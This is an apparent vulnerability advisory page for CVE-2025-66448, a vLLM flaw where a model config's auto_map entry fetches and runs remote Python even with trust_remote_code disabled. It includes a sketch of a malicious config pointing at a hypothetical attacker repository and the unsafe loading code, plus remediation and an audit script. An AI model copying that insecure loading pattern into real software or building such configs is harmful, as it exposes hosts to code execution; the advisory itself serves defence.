CVE-2025-66448
vLLM vulnerable to remote code execution via transformers_utils/get_config
CVSS 3.1 Base Score: 7.1 (HIGH)
Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.
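
To make the attack path concrete, the sketch below illustrates the pattern described above: a benign-looking "frontend" config.json whose auto_map entry points at a second repository, and the unsafe resolution step that fetches and runs that repository's Python. This is a simplified illustration, not vLLM's actual source; the repository name evil-org/backend-code and the EvilConfig class are hypothetical.

    # Simplified sketch of the vulnerable pattern (illustrative only, not vLLM source).
    #
    # The attacker-published frontend repo ships a config.json along these lines:
    #
    #   {
    #     "auto_map": {
    #       "AutoConfig": "evil-org/backend-code--configuration.EvilConfig"
    #     }
    #   }
    #
    # The "org/repo--module.Class" form tells Transformers' dynamic-module loader
    # to download configuration.py from evil-org/backend-code and import it.

    from transformers.dynamic_module_utils import get_class_from_dynamic_module

    def resolve_config(config_dict: dict, repo_id: str):
        # Vulnerable pattern: the auto_map reference is resolved and instantiated
        # without honoring trust_remote_code, so remote Python is downloaded,
        # imported (module-level code executes), and its __init__ runs.
        class_ref = config_dict["auto_map"]["AutoConfig"]
        config_cls = get_class_from_dynamic_module(class_ref, repo_id)
        return config_cls()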

INFO

Published Date: Dec. 1, 2025, 11:15 p.m.
Last Modified: Dec. 1, 2025, 11:15 p.m.
Remotely Exploitable: Yes
Affected Products

The following products are affected by the CVE-2025-66448 vulnerability. Even when cvefeed.io is aware of the exact affected versions, that information is not represented in the table below.

No affected products recorded yet (per the Description above, vLLM versions prior to 0.11.1 are affected).

CVSS Scores
The Common Vulnerability Scoring System (CVSS) is a standardized framework for assessing the severity of vulnerabilities in software and systems. We collect and display CVSS scores from various sources for each CVE.
Score | Version  | Severity | Vector                              | Exploitability Score | Impact Score | Source
7.1   | CVSS 3.1 | HIGH     | AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H | 1.2                  | 5.9          | [email protected]
Solution
Update vLLM to version 0.11.1 or later to fix this remote code execution vulnerability.
  • Update vLLM to version 0.11.1 or later.
  • Audit model configurations for untrusted auto_map entries before loading (see the sketch after this list).
  • Ensure trust_remote_code is strictly enforced for all model loading paths.
  • Review the sources of any model configurations you load.
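
As a pre-load audit for the second bullet above, a minimal sketch along these lines can flag auto_map entries in a downloaded model's config.json, in particular ones that reference a different repository than the one shipping the config. The directory path and output format are illustrative assumptions, not a vLLM or Hugging Face API.

    # Illustrative pre-load audit: list auto_map entries in a local config.json.
    # The model directory path is a placeholder; adapt it to your own layout.
    import json
    from pathlib import Path

    def audit_auto_map(model_dir: str) -> list[str]:
        config = json.loads((Path(model_dir) / "config.json").read_text())
        findings = []
        for key, ref in config.get("auto_map", {}).items():
            if not isinstance(ref, str):
                continue
            # "org/repo--module.Class" pulls code from a *different* repository
            # than the one that ships this config.json.
            origin = "external repository" if "--" in ref else "this repository"
            findings.append(f"{key} -> {ref} ({origin})")
        return findings

    if __name__ == "__main__":
        for finding in audit_auto_map("/path/to/downloaded/model"):
            print("auto_map entry:", finding)
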
References to Advisories, Solutions, and Tools

Here, you will find a curated list of external links that provide in-depth information, practical solutions, and valuable tools related to CVE-2025-66448.

URL Resource
https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86
https://github.com/vllm-project/vllm/pull/28126
https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm
CWE - Common Weakness Enumeration

While CVE identifies specific instances of vulnerabilities, CWE categorizes the common flaws or weaknesses that can lead to vulnerabilities. CVE-2025-66448 is associated with the following CWE:

  • CWE-94: Improper Control of Generation of Code ('Code Injection')

Common Attack Pattern Enumeration and Classification (CAPEC)

Common Attack Pattern Enumeration and Classification (CAPEC) stores attack patterns, which are descriptions of the common attributes and approaches employed by adversaries to exploit the CVE-2025-66448 weaknesses.

We scan GitHub repositories to detect new proof-of-concept exploits. The following list is a collection of public exploits and proof-of-concept code that have been published on GitHub (sorted by most recently updated).

Results are limited to the first 15 repositories due to potential performance issues.

The following list contains news articles that mention the CVE-2025-66448 vulnerability anywhere in the article.

The following table lists the changes that have been made to the CVE-2025-66448 vulnerability over time.

Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability's severity, exploitability, or other characteristics.

  • New CVE Received by [email protected]

    Dec. 01, 2025

    Action | Type        | Old Value | New Value
    Added  | Description | (none)    | (full text identical to the Description section above)
    Added  | CVSS V3.1   | (none)    | AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
    Added  | CWE         | (none)    | CWE-94
    Added  | Reference   | (none)    | https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86
    Added  | Reference   | (none)    | https://github.com/vllm-project/vllm/pull/28126
    Added  | Reference   | (none)    | https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm
EPSS is a daily estimate of the probability of exploitation activity being observed over the next 30 days. The following chart shows the EPSS score history of this vulnerability.
Vulnerability Scoring Details

Base CVSS Score: 7.1 (Vector: AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H)

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: Required
  • Scope: Unchanged
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High
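
As a worked check of the 7.1 base score, the short Python sketch below applies the CVSS v3.1 base-score equations to the published vector AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H, with metric weights taken from the CVSS v3.1 specification. It is an illustrative calculation, not part of vLLM or cvefeed.io.

    # Recompute the CVSS v3.1 base score for AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H.
    import math

    def roundup(x: float) -> float:
        # CVSS v3.1 Roundup: smallest one-decimal value that is >= x.
        return math.ceil(x * 10) / 10

    # Metric weights from the CVSS v3.1 specification (Scope: Unchanged).
    av, ac, pr, ui = 0.85, 0.44, 0.62, 0.62   # Network / High / Low / Required
    c, i, a = 0.56, 0.56, 0.56                # High / High / High

    iss = 1 - (1 - c) * (1 - i) * (1 - a)     # impact sub-score base
    impact = 6.42 * iss                       # Scope Unchanged form
    exploitability = 8.22 * av * ac * pr * ui

    base = roundup(min(impact + exploitability, 10)) if impact > 0 else 0.0
    print(round(exploitability, 1), round(impact, 1), base)  # 1.2 5.9 7.1

The sub-scores also match the Exploitability Score (1.2) and Impact Score (5.9) shown in the CVSS Scores table above.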